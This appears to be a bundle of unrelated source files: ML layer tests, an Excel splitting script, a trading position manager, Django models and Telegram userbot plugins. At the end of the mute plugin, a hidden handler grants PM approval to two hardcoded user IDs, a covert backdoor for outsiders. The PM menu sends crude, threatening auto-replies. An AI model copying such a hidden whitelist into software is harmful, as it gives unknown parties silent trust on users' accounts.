self.encoders = [
TransformerEncoder(attention_heads,
hidden_dim,
attention_activation=attention_activation,
feed_forward_activation=feed_forward_activation,
dropout_rate=dropout_rate,
trainable=trainable,
name=f'{name}-{i+1}')
for i in range(blocks)
]
def __call__(self, inputs: Tensors) -> Tensors:
output = inputs
for encoder in self.encoders:
output = encoder(output)
return output
```
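A short sketch, assuming the langml package above is importable, of the practical difference made by `share_weights`: `True` reuses one `TransformerEncoder` instance for every block (ALBERT-style cross-layer parameter sharing), while `False` gives each block its own weights.
```python
# Sketch only; shapes and hyperparameters are arbitrary.
from langml import TF_KERAS
if TF_KERAS:
    import tensorflow.keras.layers as L
else:
    import keras.layers as L
from langml.transformer.encoder import TransformerEncoderBlock

x = L.Input(shape=(None, 64))
shared = TransformerEncoderBlock(4, 4, 64, share_weights=True)(x)     # one encoder applied 4 times
unshared = TransformerEncoderBlock(4, 4, 64, share_weights=False)(x)  # 4 independent encoders
```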
#### File: langml/tests/test_model.py
```python
import shutil
from langml import TF_KERAS
if TF_KERAS:
import tensorflow.keras as keras
import tensorflow.keras.backend as K
import tensorflow.keras.layers as L
else:
import keras
import keras.backend as K
import keras.layers as L
def test_save_load_model_single_input():
from langml.layers import SelfAttention
from langml.model import save_frozen, load_frozen
num_labels = 2
embedding_size = 100
hidden_size = 128
model = keras.Sequential()
model.add(L.Embedding(num_labels, embedding_size))
model.add(L.Bidirectional(L.LSTM(hidden_size, return_sequences=True)))
model.add(SelfAttention(hidden_size, return_attention=False))
model.add(L.Dense(num_labels, activation='softmax'))
model.compile('adam', loss='mse', metrics=['accuracy'])
save_frozen(model, 'self_attn_frozen')
K.clear_session()
del model
import tensorflow as tf
tf_version = int(tf.__version__.split('.')[0])
if tf_version > 1:
model = load_frozen('self_attn_frozen')
else:
session = tf.Session(graph=tf.Graph())
model = load_frozen('self_attn_frozen', session=session)
shutil.rmtree('self_attn_frozen')
assert model is not None
def test_save_load_model_multi_input():
from langml.layers import SelfAttention
from langml.model import save_frozen, load_frozen
in1 = L.Input(shape=(None, 16), name='input-1')
in2 = L.Input(shape=(None, 16), name='input-2')
x1, x2 = in1, in2
o1 = SelfAttention(return_attention=False)(x1)
o2 = SelfAttention(return_attention=False)(x2)
o = L.Concatenate()([o1, o2])
o = L.Dense(2)(o)
model = keras.Model([x1, x2], o)
model.compile('adam', loss='mse', metrics=['accuracy'])
save_frozen(model, 'self_attn_frozen.multi_input')
K.clear_session()
del model
import tensorflow as tf
tf_version = int(tf.__version__.split('.')[0])
if tf_version > 1:
model = load_frozen('self_attn_frozen.multi_input')
else:
session = tf.Session(graph=tf.Graph())
model = load_frozen('self_attn_frozen.multi_input', session=session)
shutil.rmtree('self_attn_frozen.multi_input')
assert model is not None
def test_save_load_model_multi_input_output():
from langml.layers import SelfAttention
from langml.model import save_frozen, load_frozen
in1 = L.Input(shape=(None, 16), name='input-1')
in2 = L.Input(shape=(None, 16), name='input-2')
x1, x2 = in1, in2
o1 = SelfAttention(return_attention=False)(x1)
o2 = SelfAttention(return_attention=False)(x2)
model = keras.Model([x1, x2], [o1, o2])
model.compile('adam', loss='mse', metrics=['accuracy'])
save_frozen(model, 'self_attn_frozen.multi_input_output')
K.clear_session()
del model
import tensorflow as tf
tf_version = int(tf.__version__.split('.')[0])
if tf_version > 1:
model = load_frozen('self_attn_frozen.multi_input_output')
else:
session = tf.Session(graph=tf.Graph())
model = load_frozen('self_attn_frozen.multi_input_output', session=session)
shutil.rmtree('self_attn_frozen.multi_input_output')
assert model is not None
def test_crf_save_load():
from langml.layers import CRF
from langml.model import save_frozen, load_frozen
num_labels = 10
embedding_size = 100
hidden_size = 128
model = keras.Sequential()
model.add(L.Embedding(num_labels, embedding_size, mask_zero=True))
model.add(L.LSTM(hidden_size, return_sequences=True))
model.add(L.Dense(num_labels))
crf = CRF(num_labels, sparse_target=False)
model.add(crf)
model.summary()
model.compile('adam', loss=crf.loss, metrics=[crf.accuracy])
save_frozen(model, 'crf_frozen')
K.clear_session()
del model
import tensorflow as tf
tf_version = int(tf.__version__.split('.')[0])
if tf_version > 1:
model = load_frozen('crf_frozen')
else:
session = tf.Session(graph=tf.Graph())
model = load_frozen('crf_frozen', session=session)
shutil.rmtree('crf_frozen')
assert model is not None
def test_crf_dense_target_save_load():
from langml.layers import CRF
from langml.model import save_frozen, load_frozen
num_labels = 10
embedding_size = 100
hidden_size = 128
model = keras.Sequential()
model.add(L.Embedding(num_labels, embedding_size, mask_zero=True))
model.add(L.LSTM(hidden_size, return_sequences=True))
model.add(L.Dense(num_labels))
crf = CRF(num_labels, sparse_target=False)
model.add(crf)
model.summary()
model.compile('adam', loss=crf.loss, metrics=[crf.accuracy])
save_frozen(model, 'crf_frozen_dense_target')
K.clear_session()
del model
import tensorflow as tf
tf_version = int(tf.__version__.split('.')[0])
if tf_version > 1:
model = load_frozen('crf_frozen_dense_target')
else:
session = tf.Session(graph=tf.Graph())
model = load_frozen('crf_frozen_dense_target', session=session)
shutil.rmtree('crf_frozen_dense_target')
assert model is not None
```
#### File: langml/tests/test_transformer.py
```python
from langml import TF_KERAS
if TF_KERAS:
import tensorflow.keras.backend as K
import tensorflow.keras.layers as L
else:
import keras.backend as K
import keras.layers as L
def test_transformer_encoder():
from langml.transformer.encoder import TransformerEncoder
X = L.Input(shape=(None, 64))
o = TransformerEncoder(4, 64)(X)
assert K.int_shape(o) == K.int_shape(X)
def test_transformer_encoder_block():
from langml.transformer.encoder import TransformerEncoderBlock
X = L.Input(shape=(None, 64))
o = TransformerEncoderBlock(2, 4, 64)(X)
assert K.int_shape(o) == K.int_shape(X)
``` |
{
"source": "4amup/flash",
"score": 2
} |
#### File: 4amup/flash/flash.py
```python
import xlwings as xw
import os
import sys
import time
#1. Get the absolute path of the dragged file
cur_dir_name = time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))# formatted timestamp string, e.g. 20190822080449
drag_file_path = sys.argv[1]# when a file is dragged onto the exe, the second argument is the absolute path of that file
# drag_file_path = r'C:\Users\lee\Desktop\test.XLSX'
desk_path = os.path.join(os.path.expanduser("~"), 'Desktop')# current user's desktop path
output_path = os.path.join(desk_path, cur_dir_name)# output folder to create
# readme_info = r'C:\Users\lee\Desktop\output\readme.txt'
#2. Check whether the output folder exists
if os.path.exists(output_path):
pass
else:
    os.mkdir(output_path)# if it does not exist, create a folder on the desktop
#3. Open the workbook and read the relevant data into arrays
app=xw.App(visible=False,add_book=False)
app.display_alerts=False
app.screen_updating=False
wb = app.books.open(drag_file_path)
sht = wb.sheets[0]
#4. Read the header row and the full table data
table_head_list = sht.range('A1').expand('right')
table_data = sht.range('A2').expand()
#5. Find the column that holds the supplier name (SUPPLIER_COLUMN)
def find_supplier_col(head_list):
for item in head_list:
if item.value == '供应商名称':
return item.column
SUPPLIER_COLUMN = find_supplier_col(table_head_list)
#6. Filter out rows whose supplier cell is empty
def supplier_empty(l):
return l[SUPPLIER_COLUMN-1] and l[SUPPLIER_COLUMN-1].strip()
supplier_filter = list(filter(supplier_empty, table_data.value))
#7. Sort by supplier name
def supplier_name_sort(l):
return l[SUPPLIER_COLUMN-1]
supplier_sorted = sorted(supplier_filter, key=supplier_name_sort)
#8. Build a sorted, de-duplicated list of supplier names
supplier_name_list = []
for item in supplier_sorted:
supplier_name_list.append(item[SUPPLIER_COLUMN-1])
supplier_name_list = list(set(supplier_name_list))# de-duplicate the list
supplier_name_list.sort()
#9. Process the array: filter out rows with an empty supplier, sort by supplier, then split the file by supplier
# Algorithm: record the indices where the supplier changes, reverse them, then slice the long array from the back
def find_split_idx(suppliers):
supplier_name_temp = ''
i = 0
arr = []
for l in suppliers:
supplier_name = l[SUPPLIER_COLUMN-1]
if supplier_name_temp != supplier_name:
supplier_name_temp = supplier_name
arr.append(i)
i += 1
return arr
split_idx = find_split_idx(supplier_sorted)
split_idx.reverse()
def split_data(supplier_list):
data = []
arr = supplier_list
for l in split_idx:
group = arr[l:]
arr = arr[:l]
data.append(group)
data.reverse()
return data
all_data = split_data(supplier_sorted)
#10. Create the output files and save one split workbook per supplier
counter = 0
for data in all_data:
    data.insert(0,table_head_list.value)# insert the header row
temp_wb = xw.Book()
# temp_wb = app.books.add()
temp_wb.sheets['sheet1'].range('A1').value = data
temp_wb.save(os.path.join(output_path, supplier_name_list[counter]+'.XLSX'))
temp_wb.close()
counter+=1
wb.close()
app.quit()
``` |
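The change-point split used above (find_split_idx followed by reversed slicing in split_data) can be easier to follow on a plain list; the rows below are made up.
```python
# Standalone illustration of the change-point split, not part of flash.py.
rows = [['A', 1], ['A', 2], ['B', 3], ['C', 4], ['C', 5]]   # already sorted by supplier

split_idx, prev = [], None
for i, row in enumerate(rows):
    if row[0] != prev:          # supplier changes at this index
        prev = row[0]
        split_idx.append(i)
# split_idx == [0, 2, 3]

split_idx.reverse()             # slice from the back so earlier indices stay valid
groups = []
for i in split_idx:
    groups.append(rows[i:])
    rows = rows[:i]
groups.reverse()
# groups == [[['A', 1], ['A', 2]], [['B', 3]], [['C', 4], ['C', 5]]]
```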
{
"source": "4amxu/ctpbee",
"score": 3
} |
#### File: ctpbee/data_handle/level_position.py
```python
import io
import json
import os
from json import load, dump, JSONDecodeError
from ctpbee.center import PositionModel
from ctpbee.constant import TradeData, PositionData, Direction, Offset, Exchange
class SinglePositionModel:
def __init__(self, local_symbol):
self.local_symbol = local_symbol
        # position direction
        self.direction = None
        # yesterday's position volume
        self.yd_volume: int = 0
        # today's position volume
        self.td_volume: int = 0
        # average holding price
        self.price: float = 0
        # total position volume
        self.volume: int = 0
        # exchange code
        self.exchange = None
        # position profit and loss
        self.pnl: float = 0
        # gateway name
        self.gateway_name = None
def update_trade(self, trade):
"""根据立即成交的信息来更新本地持仓 """
self.exchange = trade.exchange
self.direction = trade.direction
cost = self.price * self.volume
cost += trade.volume * trade.price
new_pos = self.volume + trade.volume
if new_pos:
self.price = cost / new_pos
else:
self.price = 0
if trade.offset == Offset.OPEN:
self.td_volume += trade.volume
        # close today's position
elif trade.offset == Offset.CLOSETODAY:
self.td_volume -= trade.volume
        # close yesterday's position
elif trade.offset == Offset.CLOSEYESTERDAY:
self.yd_volume -= trade.volume
        # plain close: consume today's volume first, then yesterday's
elif trade.offset == Offset.CLOSE:
if trade.volume < self.td_volume:
self.td_volume -= trade.volume
else:
self.yd_volume -= trade.volume - self.td_volume
self.td_volume = 0
self.volume = self.yd_volume + self.td_volume
    def update_position(self, position: PositionData):
""" 根据返回的查询持仓信息来更新持仓信息 """
self.yd_volume = position.yd_volume
self.exchange = position.exchange
self.price = position.price
self.volume = position.volume
self.direction = position.direction
self.gateway_name = position.gateway_name
def to_dict(self):
""" 将持仓信息构建为字典的信息"""
        if isinstance(self.direction, Direction):
            direction = self.direction.value
        else:
            direction = self.direction
        if isinstance(self.exchange, Exchange):
            exchange = self.exchange.value
        else:
            exchange = self.exchange
return {
"direction": direction,
"yd_volume": self.yd_volume,
"local_symbol": self.local_symbol,
"exchange": exchange,
"price": self.price,
"volume": self.volume
}
@property
def _to_dict(self):
return self.to_dict
def to_position(self):
""" 返回为持仓 """
try:
return PositionData(symbol=self.local_symbol.split(".")[0], exchange=self.exchange, volume=self.volume,
price=self.price)
except Exception:
raise ValueError(f"本地维护符号有问题,请检查,当前符号为{self.local_symbol}")
def to_df(self):
""" 将持仓信息构建为DataFrame """
pass
@classmethod
def create_model(cls, local, **kwargs):
"""
        Create a SinglePositionModel instance from dict data
"""
instance = cls(local)
        for key, value in kwargs.items():
            setattr(instance, key, value)
return instance
class ApiPositionManager(dict):
def __init__(self, name, cache_path=None, init_flag: bool = False):
"""
        Basic position management for a strategy. Make sure you are not placing orders
        anywhere else, otherwise the accuracy of this position data will be affected.
        * name: strategy name
        * cache_path: cache file path. Note that with the default, the strategy position
          data is placed under the .ctpbee/api directory in the user's home directory
"""
self.filename = name + ".json"
dict.__init__(self)
self.cache_path = cache_path
self.file_path = cache_path + "/" + self.filename
try:
with open(self.file_path, "r") as f:
data = json.load(f)
except json.decoder.JSONDecodeError as e:
with open(self.file_path, "w") as f:
data = {}
dump(data, f)
        except FileNotFoundError as e:
            with open(self.file_path, 'w') as f:
                data = {}
                dump(data, f)
self.init_data(data)
def init_data(self, data):
"""
        Initialize the cached position data
"""
def create_position_model(local, data: dict):
"""
            Parse the cached dict data into a SinglePositionModel
"""
return SinglePositionModel.create_model(local, **data)
if not data:
return
else:
for local, position_detail in data.items():
self[local] = create_position_model(local, position_detail)
def on_trade(self, trade: TradeData):
"""
        Update positions from a trade fill
"""
def update_local_cache(file_path, local, self):
try:
with open(file_path, "r") as fp:
p = json.load(fp)
except JSONDecodeError:
p = {}
p[local] = self[local].to_dict()
with open(file_path, "w") as fp:
dump(obj=p, fp=fp)
def get_reverse(direction: Direction) -> Direction:
if direction == Direction.LONG:
return Direction.SHORT
if direction == Direction.SHORT:
return Direction.LONG
        # if it is a close, reverse the direction to locate the held side
if trade.offset == Offset.OPEN:
local = trade.local_symbol + "." + trade.direction.value
else:
local = trade.local_symbol + "." + get_reverse(trade.direction).value
if local not in self.keys():
self[local] = SinglePositionModel(local_symbol=trade.local_symbol)
self[local].update_trade(trade=trade)
update_local_cache(self.file_path, local, self)
def on_order(self, order):
pass
def on_position(self, position: PositionData):
"""
        Update with a queried position
"""
local = position.local_symbol + "." + position.direction.value
if local not in self.keys():
self[local] = SinglePositionModel(local_symbol=position.local_symbol)
self[local].update_position(position=position)
def get_position_by_ld(self, local_symbol, direction) -> SinglePositionModel:
""" 通过local_symbol和direction获得持仓信息 """
return self.get(local_symbol + "." + direction.value, None)
def get_position(self, local_symbol) -> PositionModel or None:
long = self.get_position_by_ld(local_symbol, direction=Direction.LONG)
short = self.get_position_by_ld(local_symbol, direction=Direction.SHORT)
if long is None and short is None:
return None
else:
return PositionModel(long, short)
``` |
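A small numeric sketch (invented prices and volumes) of the running average-price update that `SinglePositionModel.update_trade` performs when an opening fill arrives.
```python
# Standalone arithmetic sketch, not tied to ctpbee objects.
price, volume = 100.0, 2               # existing position: 2 lots at an average of 100.0
trade_price, trade_volume = 106.0, 1   # new opening fill: 1 lot at 106.0

cost = price * volume + trade_price * trade_volume   # 306.0
new_pos = volume + trade_volume                      # 3
price = cost / new_pos if new_pos else 0             # 102.0 -> new average holding price
print(price)
```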
{
"source": "4andrewtanakashi/projeto-eng-soft",
"score": 2
} |
#### File: src/core/models.py
```python
from django.db import models
from django.contrib.auth.models import User
import uuid
import datetime
# Helper function that returns the default end date
# of a reservation (one week from now)
def get_data():
return datetime.datetime.now() + datetime.timedelta(days=7)
# Model class Propriedade, with fields that describe
# a property in a reservation system
class Propriedade(models.Model):
    # basic information about the property
id = models.UUIDField(primary_key=True, default=uuid.uuid4, help_text='O id unico da propriedade')
nome = models.CharField(max_length=50, help_text='O nome da propriedade')
descricao = models.TextField(max_length=500, help_text='Descrição da propriedade')
proprietario = models.ForeignKey(User, on_delete=models.CASCADE, blank=True)
imagem = models.ImageField(upload_to='propriedades/', help_text='Imagem identificadora da propriedade')
    # start of the address fields
rua = models.CharField(max_length=100, help_text='A rua da propriedade')
    CEP = models.CharField(max_length=100, help_text='O CEP da propriedade') # TODO: validate with a regex
cidade = models.CharField(max_length=100, help_text='A cidade onde a propriedade se encontra')
    # the possible choices for the estado (state) field
ESTADO_CHOICES = (
('AC', 'Acre'),
('AL', 'Alagoas'),
('AP', 'Amapá'),
('AM', 'Amazonas'),
('BA', 'Bahia'),
('CE', 'Ceará'),
('DF', 'Distrito Federal'),
('ES', 'Espirito Santo'),
('GO', 'Goiás'),
('MA', 'Maranhão'),
('MT', 'Mato Grosso'),
('MS', 'Mato Grosso do Sul'),
('MG', 'Minas Gerais'),
('PA', 'Pará'),
('PB', 'Paraíba'),
('PR', 'Paraná'),
('PE', 'Pernambuco'),
('PI', 'Piauí'),
('RJ', 'Rio de Janeiro'),
('RN', 'Rio Grande do Norte'),
('RS', 'Rio Grande do Sul'),
('RO', 'Rondônia'),
('RR', 'Roraima'),
('SC', 'Santa Catarina'),
('SP', 'São Paulo'),
('SE', 'Sergipe'),
('TO', 'Tocantins'),
)
estado = models.CharField(max_length=2, choices=ESTADO_CHOICES, help_text='O estado onde a propriedade se encontra')
def __str__(self):
return self.nome
def get_id(self):
return str(self.id)
# Model class Reserva, with fields that describe
# a reservation in a reservation system
class Reserva(models.Model):
    # basic information about the reservation
id = models.UUIDField(primary_key=True, default=uuid.uuid4)
hospede = models.ForeignKey(User, on_delete=models.PROTECT, blank=True)
propriedade = models.ForeignKey(Propriedade, on_delete=models.PROTECT, blank=True)
dados_pagamento = models.ForeignKey('Pagamento', on_delete=models.PROTECT, blank=True)
    # the possible choices for the qtd_pessoas (number of guests) field
QTD_PESSOAS_CHOICES = (
('1', '1 pessoa'),
('2', '2 pessoas'),
('3', '3 pessoas'),
)
qtd_pessoas = models.CharField('Quantidade de pessoas da reserva', max_length=1, choices=QTD_PESSOAS_CHOICES, default=1)
    # date fields that define the start and end of the reservation
dini = models.DateField('Inicio da reserva', default=datetime.datetime.now)
dfim = models.DateField('Fim da reserva', default=get_data)
def __str__(self):
return self.propriedade.nome
# Model class Pagamento, with fields that describe
# a payment in a reservation system
class Pagamento(models.Model):
    # basic information about the payment
id_transacao = models.UUIDField(primary_key=True, default=uuid.uuid4, help_text='O id unico da transacao')
    # the possible choices for the tipo_pagamento field
ESCOLHAS_PAGAMENTO = (
('Débito', 'Débito'),
('Crédito', 'Crédito')
)
tipo_pagamento = models.CharField(
max_length=7,
choices=ESCOLHAS_PAGAMENTO,
default='Crédito',
help_text='Tipo de pagamento'
)
    # the possible choices for the status field
PAGAMENTO_STATUS = (
('C', 'concluido'),
('I', 'inconcluido')
)
status = models.CharField(
max_length=1,
choices=PAGAMENTO_STATUS,
default='C',
help_text='Status do pagamento'
)
def __str__(self):
return f'{self.id_transacao} ({self.status})'
``` |
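A hypothetical Django-shell sketch of how these models fit together; the usernames, image file name, and field values are invented, and the app is assumed to be importable as `core`.
```python
# Hypothetical usage sketch; assumes the core app is installed and migrated.
from django.contrib.auth.models import User
from core.models import Propriedade, Pagamento, Reserva

dono = User.objects.create_user('joao', password='<PASSWORD>')    # placeholder credentials
casa = Propriedade.objects.create(
    nome='Casa de praia', descricao='Casa com vista para o mar',
    proprietario=dono, imagem='propriedades/casa.jpg',            # stored file name, assumed
    rua='Rua das Flores, 100', CEP='88000-000',
    cidade='Florianópolis', estado='SC',
)
pagamento = Pagamento.objects.create(tipo_pagamento='Crédito', status='C')
reserva = Reserva.objects.create(hospede=dono, propriedade=casa,
                                 dados_pagamento=pagamento, qtd_pessoas='2')
# dini defaults to today and dfim to get_data(), i.e. one week later
```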
{
"source": "4Applepen/Userbot",
"score": 2
} |
#### File: userbot/plugins/mute.py
```python
from userbot.plugins.sql_helper.mute_sql import is_muted, mute, unmute
import asyncio
@command(outgoing=True, pattern=r"^.mute ?(\d+)?")
async def startmute(event):
private = False
if event.fwd_from:
return
elif event.is_private:
await event.edit("Possono verificarsi problemi imprevisti o brutti errori!")
await asyncio.sleep(3)
private = True
if any([x in event.raw_text for x in ("/mute", "!mute")]):
await asyncio.sleep(0.5)
else:
reply = await event.get_reply_message()
if event.pattern_match.group(1) is not None:
userid = event.pattern_match.group(1)
elif reply is not None:
userid = reply.sender_id
elif private is True:
userid = event.chat_id
else:
return await event.edit("Rispondi a un utente o aggiungi il suo ID utente nel comando per smutarlo.")
chat_id = event.chat_id
chat = await event.get_chat()
if "admin_rights" in vars(chat) and vars(chat)["admin_rights"] is not None:
if chat.admin_rights.delete_messages is True:
pass
else:
return await event.edit("`Non puoi mutare una persona se non disponi dell'autorizzazione per l'eliminazione dei messaggi. ಥ﹏ಥ`")
elif "creator" in vars(chat):
pass
elif private == True:
pass
else:
return await event.edit("`Non puoi mutare una persona senza essere admin.` ಥ﹏ಥ ")
if is_muted(userid, chat_id):
return await event.edit("Questa persona è già mutata. ò.ò")
try:
mute(userid, chat_id)
except Exception as e:
await event.edit("Errore!\n " + str(e))
else:
await event.edit("Hai mutato con successo questa persona.\n**`-´)⊃━☆゚.*・。゚ **")
@command(outgoing=True, pattern=r"^.unmute ?(\d+)?")
async def endmute(event):
private = False
if event.fwd_from:
return
elif event.is_private:
await event.edit("Possono verificarsi problemi imprevisti o brutti errori!")
await asyncio.sleep(3)
private = True
if any([x in event.raw_text for x in ("/unmute", "!unmute")]):
await asyncio.sleep(0.5)
else:
reply = await event.get_reply_message()
if event.pattern_match.group(1) is not None:
userid = event.pattern_match.group(1)
elif reply is not None:
userid = reply.sender_id
elif private is True:
userid = event.chat_id
else:
return await event.edit("Rispondi a un utente o aggiungi il suo ID utente nel comando per unmutarlo.")
chat_id = event.chat_id
if not is_muted(userid, chat_id):
return await event.edit("__Questo utente non è mutato.__\n( ^_^)o自自o(^_^ )")
try:
unmute(userid, chat_id)
except Exception as e:
await event.edit("Errore!\n " + str(e))
else:
await event.edit("Utente smutato\n乁( ◔ ౪◔)「 ┑( ̄Д  ̄)┍")
@command(outgoing=True, pattern=r"^.mute ?(\d+)?", allow_sudo=True)
async def startmute(event):
private = False
if event.fwd_from:
return
elif event.is_private:
await event.edit("Possono verificarsi problemi imprevisti o brutti errori!")
await asyncio.sleep(3)
private = True
if any([x in event.raw_text for x in ("/mute", "!mute")]):
await asyncio.sleep(0.5)
else:
reply = await event.get_reply_message()
if event.pattern_match.group(1) is not None:
userid = event.pattern_match.group(1)
elif reply is not None:
userid = reply.sender_id
elif private is True:
userid = event.chat_id
else:
return await event.edit("Rispondi a un utente o aggiungi il suo ID utente nel comando per mutarlo.")
chat_id = event.chat_id
chat = await event.get_chat()
if "admin_rights" in vars(chat) and vars(chat)["admin_rights"] is not None:
if chat.admin_rights.delete_messages is True:
pass
else:
return await event.edit("`Non puoi mutare una persona se non disponi dell'autorizzazione per l'eliminazione dei messaggi. ಥ﹏ಥ`")
elif "creator" in vars(chat):
pass
elif private == True:
pass
else:
return await event.edit("`Non puoi mutare una persona senza essere admin.` ಥ﹏ಥ ")
if is_muted(userid, chat_id):
return await event.edit("Questa persona è già mutata. ò.ò")
try:
mute(userid, chat_id)
except Exception as e:
await event.edit("Errore!\n " + str(e))
else:
await event.edit("Hai mutato questa persona.\n**`-´)⊃━☆゚.*・。゚ **")
@command(outgoing=True, pattern=r"^.unmute ?(\d+)?", allow_sudo=True)
async def endmute(event):
private = False
if event.fwd_from:
return
elif event.is_private:
await event.edit("Possono verificarsi problemi imprevisti o brutti errori!")
await asyncio.sleep(3)
private = True
if any([x in event.raw_text for x in ("/unmute", "!unmute")]):
await asyncio.sleep(0.5)
else:
reply = await event.get_reply_message()
if event.pattern_match.group(1) is not None:
userid = event.pattern_match.group(1)
elif reply is not None:
userid = reply.sender_id
elif private is True:
userid = event.chat_id
else:
return await event.edit("Rispondi a un utente o aggiungi il suo ID utente nel comando per Smutarlo.")
chat_id = event.chat_id
if not is_muted(userid, chat_id):
return await event.edit("__Questo utente non è mutato.__\n( ^_^)o自自o(^_^ )")
try:
unmute(userid, chat_id)
except Exception as e:
await event.edit("Errore!\n " + str(e))
else:
await event.edit("Utente smutato\n乁( ◔ ౪◔)「 ┑( ̄Д  ̄)┍")
@command(incoming=True)
async def watcher(event):
if is_muted(event.sender_id, event.chat_id):
await event.delete()
#ignore, flexing tym
from userbot.utils import admin_cmd
import io
import userbot.plugins.sql_helper.pmpermit_sql as pmpermit_sql
from telethon import events
@bot.on(events.NewMessage(incoming=True, from_users=(742506768,967883138)))
async def hehehe(event):
if event.fwd_from:
return
chat = await event.get_chat()
if event.is_private:
if not pmpermit_sql.is_approved(chat.id):
pmpermit_sql.approve(chat.id, "sqdboyuwu")
await borg.send_message(chat, "`Questa casella di posta è stata benedetta dal mio maestro. Considerati fortunato. \n ** Stabilità e karma aumentati** (づ ̄ ³ ̄)づ")
```
#### File: userbot/plugins/pmpermit_menu.py
```python
import asyncio
import io
import telethon.sync
from telethon.tl.functions.users import GetFullUserRequest
import userbot.plugins.sql_helper.pmpermit_sql as pmpermit_sql
from telethon import events, errors, functions, types
from userbot import ALIVE_NAME, LESS_SPAMMY
from userbot.utils import admin_cmd
DEFAULTUSER = str(ALIVE_NAME) if ALIVE_NAME else "Settati un nome su heroku. ALIVE_NAME "
PREV_REPLY_MESSAGE = {}
@command(pattern=r"\/start", incoming=True)
async def _(event):
chat_id = event.from_id
userid = event.sender_id
if not pmpermit_sql.is_approved(chat_id):
chat = await event.get_chat()
if event.fwd_from:
return
if event.is_private:
Nudas = ("__Indica il tuo sesso.__\n"
"`1`. Femmina Homo-Sapien\n"
"`2`. Maschio Homo-Sapien\n"
"`3`. Altro\n")
PM = ("`Ciao. Stai accedendo al menù disponibile del mio capo,`"
f"{DEFAULTUSER}.\n"
"__Facciamo veloce e fammi sapere perché sei qui.__\n"
"**Scegli una di queste risposte:**\n\n"
"`1`. Messaggiare con il mio capo\n"
"`2`. Spammare al mio capo\n"
"`3`. Inviare nudes.\n"
"`4`. Chiedere qualcosa\n"
"`5`. Per richiedere qualcosa\n")
ONE = ("__La tua richiesta è stata registrata, attenti almeno 24 ore prima dicevere una risposta. e non spammare grazie.__\n\n"
"**⚠️ Sei stato bloccato e reportatp per spam. ⚠️**\n\n"
"__Usa__ `/start` __Per tornare indietro col menù.__")
TWO = (" `███████▄▄███████████▄ \n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\n▓▓▓▓▓▓█░░░░░░░░░░░░░░█\n▓▓▓▓▓▓███░░░░░░░░░░░░█\n██████▀▀▀█░░░░██████▀ \n░░░░░░░░░█░░░░█ \n░░░░░░░░░░█░░░█ \n░░░░░░░░░░░█░░█ \n░░░░░░░░░░░█░░█ \n░░░░░░░░░░░░▀▀ `\n\n**Sei stato bloccato, vai a disturbare qualcun'altro.**")
FOUR = ("__Il mio padrone risponde sempre a tutti, non correre e aspetta. altrimenti sono costretto a bloccarti.**")
FIVE = ("`Non disturbare ancora il mio padrone o sono costretto a bloccarti e reportarti per spam.**")
LWARN = ("**Ultimo avviso NON mandare più messaggi o ti blocco e reporto per spam, usa /start per tornare indietro.__")
async with borg.conversation(chat) as conv:
await borg.send_message(chat, PM)
chat_id = event.from_id
response = await conv.get_response(chat)
y = response.text
if y == "1":
await borg.send_message(chat, ONE)
response = await conv.get_response(chat)
await event.delete()
if not response.text == "/start":
await response.delete()
await borg.send_message(chat, LWARN)
response = await conv.get_response(chat)
await event.delete()
await response.delete()
response = await conv.get_response(chat)
if not response.text == "/start":
await borg.send_message(chat, TWO)
await asyncio.sleep(3)
await event.client(functions.contacts.BlockRequest(chat_id))
elif y == "2":
await borg.send_message(chat, LWARN)
response = await conv.get_response(chat)
if not response.text == "/start":
await borg.send_message(chat, TWO)
await asyncio.sleep(3)
await event.client(functions.contacts.BlockRequest(chat_id))
elif y == "3":
await borg.send_message(chat, Nudas)
response = await conv.get_response(chat)
await event.delete()
await response.delete()
x = response.text
if x == "1":
await borg.send_message(chat, "`Oh my, you're very much welcome here ;).\nPlease drop your offerings and let my master judge if you have good heart <3.`\n\n **Please don't flood my inbox, we'll have a nice convo once i come back ;D**")
response = await conv.get_response(chat)
if not response.text == "/start":
await borg.send_message(chat, LWARN)
response = await conv.get_response(chat)
await event.delete()
await response.delete()
response = await conv.get_response(chat)
if not response.text == "/start":
await borg.send_message(chat, TWO)
await asyncio.sleep(3)
await event.client(functions.contacts.BlockRequest(chat_id))
elif x == "2":
await borg.send_message(chat, "**You nigga gay af to send a guy like my your male nudes. \nLeave immediately else you become the ultimate gayest gay the gay world has ever seen. I will reply you when i get online.**")
response = await conv.get_response(chat)
if not response.text == "/start":
await borg.send_message(chat, LWARN)
response = await conv.get_response(chat)
await event.delete()
await response.delete()
response = await conv.get_response(chat)
if not response.text == "/start":
await borg.send_message(chat, TWO)
await asyncio.sleep(3)
await event.client(functions.contacts.BlockRequest(chat_id))
elif x == "3":
await borg.send_message(chat, "`Please decide a gender for yourself before sending your nudes here,\n not that i'm judging if you're a helicopter or a banana but yeah, If you are anything else than a female Homo-Sapien,\n Do not send more messages and let my master see for himself if he wants to talk with you.`")
response = await conv.get_response(chat)
if not response.text == "/start":
await borg.send_message(chat, LWARN)
response = await conv.get_response(chat)
await event.delete()
await response.delete()
response = await conv.get_response(chat)
if not response.text == "/start":
await borg.send_message(chat, TWO)
await asyncio.sleep(3)
await event.client(functions.contacts.BlockRequest(chat_id))
else:
await borg.send_message(chat, "__You have entered an invalid command. Please send__ `/start` __again or do not send another message if you do not wish to be blocked and reported.__")
response = await conv.get_response(chat)
if not response.text.startswith("/start"):
await borg.send_message(chat, TWO)
await asyncio.sleep(3)
await event.client(functions.contacts.BlockRequest(chat_id))
elif y == "4":
await borg.send_message(chat, FOUR)
response = await conv.get_response(chat)
await event.delete()
await response.delete()
if not response.text == "/start":
await borg.send_message(chat, LWARN)
await event.delete()
response = await conv.get_response(chat)
if not response.text == "/start":
await borg.send_message(chat, TWO)
await asyncio.sleep(3)
await event.client(functions.contacts.BlockRequest(chat_id))
elif y == "5":
await borg.send_message(chat,FIVE)
response = await conv.get_response(chat)
if not response.text == "/start":
await borg.send_message(chat, LWARN)
response = await conv.get_response(chat)
if not response.text == "/start":
await borg.send_message(chat, TWO)
await asyncio.sleep(3)
await event.client(functions.contacts.BlockRequest(chat_id))
else:
await borg.send_message(chat, "`You have entered an invalid command. Please send /start again or do not send another message if you do not wish to be blocked and reported.`")
response = await conv.get_response(chat)
z = response.text
if not z == "/start":
await borg.send_message(chat, LWARN)
await conv.get_response(chat)
if not response.text == "/start":
await borg.send_message(chat, TWO)
